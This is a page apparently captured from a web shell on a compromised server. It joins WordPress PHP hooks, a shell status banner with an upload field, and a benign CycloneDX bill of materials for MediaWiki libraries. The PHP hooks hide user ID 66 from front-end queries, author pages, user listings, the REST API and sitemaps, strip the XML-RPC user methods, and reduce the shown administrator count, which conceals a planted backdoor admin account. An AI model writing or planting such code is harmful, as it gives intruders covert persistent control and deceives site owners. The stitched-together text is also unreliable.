add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/resources/lib/ |
Upload File : |
{
"$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json",
"bomFormat": "CycloneDX",
"specVersion": "1.6",
"serialNumber": "urn:uuid:7b61f6ab-2484-410e-b843-1468dfb75c49",
"version": 1,
"components": [
{
"type": "library",
"name": "CLDRPluralRuleParser",
"version": "1.3.1-0dda851",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:github/santhoshtr/CLDRPluralRuleParser@0dda851#src/CLDRPluralRuleParser.js",
"authors": [
{
"name": "Santhosh Thottingal"
}
],
"externalReferences": [
{
"url": "https://github.com/santhoshtr/CLDRPluralRuleParser",
"type": "website"
}
]
},
{
"type": "library",
"name": "codex",
"version": "1.23.0",
"licenses": [
{
"license": {
"id": "GPL-2.0+"
}
}
],
"purl": "pkg:npm/@wikimedia/codex@1.23.0",
"authors": [
{
"name": "Design System team"
},
{
"name": "Wikimedia Foundation"
}
],
"externalReferences": [
{
"url": "https://doc.wikimedia.org/codex/",
"type": "website"
}
]
},
{
"type": "library",
"name": "codex-design-tokens",
"version": "1.23.0",
"licenses": [
{
"license": {
"id": "GPL-2.0+"
}
}
],
"purl": "pkg:npm/@wikimedia/codex-design-tokens@1.23.0",
"authors": [
{
"name": "Design System team"
},
{
"name": "Wikimedia Foundation"
}
],
"externalReferences": [
{
"url": "https://doc.wikimedia.org/codex/",
"type": "website"
}
]
},
{
"type": "library",
"name": "codex-icons",
"version": "1.23.0",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/@wikimedia/codex-icons@1.23.0",
"authors": [
{
"name": "Design System team"
},
{
"name": "Wikimedia Foundation"
}
],
"externalReferences": [
{
"url": "https://doc.wikimedia.org/codex/",
"type": "website"
}
]
},
{
"type": "library",
"name": "url",
"version": "3.111.0-0ece79ce32",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:github/mrhenry/polyfill-library@0ece79ce32",
"authors": [
{
"name": "Financial Times"
}
],
"externalReferences": [
{
"url": "https://github.com/mrhenry/polyfill-library",
"type": "website"
}
]
},
{
"type": "library",
"name": "fetch-polyfill",
"version": "3.6.2",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"authors": [
{
"name": "GitHub"
},
{
"name": "Inc."
}
],
"externalReferences": [
{
"url": "https://github.com/github/fetch#readme",
"type": "website"
}
]
},
{
"type": "library",
"name": "intersection-observer",
"version": "0.12.0",
"licenses": [
{
"license": {
"id": "Apache-2.0"
}
}
],
"purl": "pkg:npm/intersection-observer@0.12.0",
"authors": [
{
"name": "Philip Walton"
}
],
"externalReferences": [
{
"url": "https://github.com/GoogleChromeLabs/intersection-observer",
"type": "website"
}
]
},
{
"type": "library",
"name": "jquery",
"version": "3.7.1",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"authors": [
{
"name": "OpenJS Foundation and other contributors"
}
],
"externalReferences": [
{
"url": "https://jquery.com",
"type": "website"
}
]
},
{
"type": "library",
"name": "jquery.chosen",
"version": "1.8.2",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:github/harvesthq/chosen@1.8.2",
"authors": [
{
"name": "Patrick Filler for Harvest"
},
{
"name": "Matthew Lettini"
},
{
"name": "Patrick Filler"
},
{
"name": "Ken Earley"
},
{
"name": "Christophe Coevoet"
},
{
"name": "Koen Punt"
},
{
"name": "T.J. Schuck."
}
],
"externalReferences": [
{
"url": "https://harvesthq.github.io/chosen/",
"type": "website"
}
]
},
{
"type": "library",
"name": "jquery.client",
"version": "3.0.0",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/jquery-client@3.0.0",
"authors": [
{
"name": "Trevor Parscal"
},
{
"name": "Timo Tijhof"
},
{
"name": "Roan Kattouw"
}
],
"externalReferences": [
{
"url": "https://www.npmjs.com/package/jquery-client",
"type": "website"
}
]
},
{
"type": "library",
"name": "jquery.i18n",
"version": "1.0.10",
"licenses": [
{
"expression": "MIT OR GPL-2.0-or-later"
}
],
"purl": "pkg:github/wikimedia/jquery.i18n@1.0.10",
"authors": [
{
"name": "Language Engineering team"
},
{
"name": "Wikimedia Foundation"
}
],
"externalReferences": [
{
"url": "https://github.com/wikimedia/jquery.i18n",
"type": "website"
}
]
},
{
"type": "library",
"name": "jquery.ui",
"version": "1.9.2",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"authors": [
{
"name": "OpenJS Foundation and other contributors"
}
],
"externalReferences": [
{
"url": "https://jqueryui.com",
"type": "website"
}
]
},
{
"type": "library",
"name": "moment",
"version": "2.30.1",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:github/moment/moment@2.30.1",
"authors": [
{
"name": "JS Foundation and other contributors"
}
],
"externalReferences": [
{
"url": "https://momentjs.com",
"type": "website"
}
]
},
{
"type": "library",
"name": "mustache",
"version": "4.2.0",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/mustache@4.2.0",
"authors": [
{
"name": "Michael Jackson"
},
{
"name": "Jan Lehnardt"
},
{
"name": "Phillip Johnsen"
},
{
"name": "other contributors"
}
],
"externalReferences": [
{
"url": "https://github.com/janl/mustache.js",
"type": "website"
}
]
},
{
"type": "library",
"name": "oojs",
"version": "7.0.1",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/oojs@7.0.1",
"authors": [
{
"name": "OOjs Team and other contributors"
}
],
"externalReferences": [
{
"url": "https://www.mediawiki.org/wiki/OOjs",
"type": "website"
}
]
},
{
"type": "library",
"name": "ooui",
"version": "0.51.7",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/oojs-ui@0.51.7",
"authors": [
{
"name": "OOUI Team and other contributors"
}
],
"externalReferences": [
{
"url": "https://www.mediawiki.org/wiki/OOUI",
"type": "website"
}
]
},
{
"type": "library",
"name": "pako",
"version": "2.1.0",
"licenses": [
{
"expression": "MIT AND Zlib"
}
],
"purl": "pkg:github/nodeca/pako@2.1.0",
"authors": [
{
"name": "Andrei Tuputcyn"
},
{
"name": "Vitaly Puzrin"
},
{
"name": "Friedel Ziegelmayer"
},
{
"name": "Kirill Efimov"
},
{
"name": "Jean-loup Gailly"
},
{
"name": "Mark Adler"
}
],
"externalReferences": [
{
"url": "https://github.com/nodeca/pako",
"type": "website"
}
]
},
{
"type": "library",
"name": "pinia",
"version": "2.0.16",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/pinia@2.0.16",
"authors": [
{
"name": "Eduardo San Martin Morote"
}
],
"externalReferences": [
{
"url": "https://pinia.vuejs.org/",
"type": "website"
}
]
},
{
"type": "library",
"name": "qunitjs",
"version": "2.24.1",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"authors": [
{
"name": "OpenJS Foundation and other contributors"
}
],
"externalReferences": [
{
"url": "https://qunitjs.com",
"type": "website"
}
]
},
{
"type": "library",
"name": "sinonjs",
"version": "18.0.1",
"licenses": [
{
"license": {
"id": "BSD-3-Clause"
}
}
],
"authors": [
{
"name": "Christian Johansen and other contributors"
}
],
"externalReferences": [
{
"url": "https://sinonjs.org/",
"type": "website"
}
]
},
{
"type": "library",
"name": "vue-demi",
"version": "0.14.7",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/vue-demi@0.14.7",
"authors": [
{
"name": "Anthony Fu"
}
],
"externalReferences": [
{
"url": "https://github.com/vueuse/vue-demi/",
"type": "website"
}
]
},
{
"type": "library",
"name": "vue",
"version": "3.5.13",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/vue@3.5.13",
"authors": [
{
"name": "Yuxi (Evan) You"
}
],
"externalReferences": [
{
"url": "https://vuejs.org/",
"type": "website"
}
]
},
{
"type": "library",
"name": "vuex",
"version": "4.0.2",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"purl": "pkg:npm/vuex@4.0.2",
"authors": [
{
"name": "Yuxi (Evan) You"
}
],
"externalReferences": [
{
"url": "https://vuex.vuejs.org/",
"type": "website"
}
]
}
]
}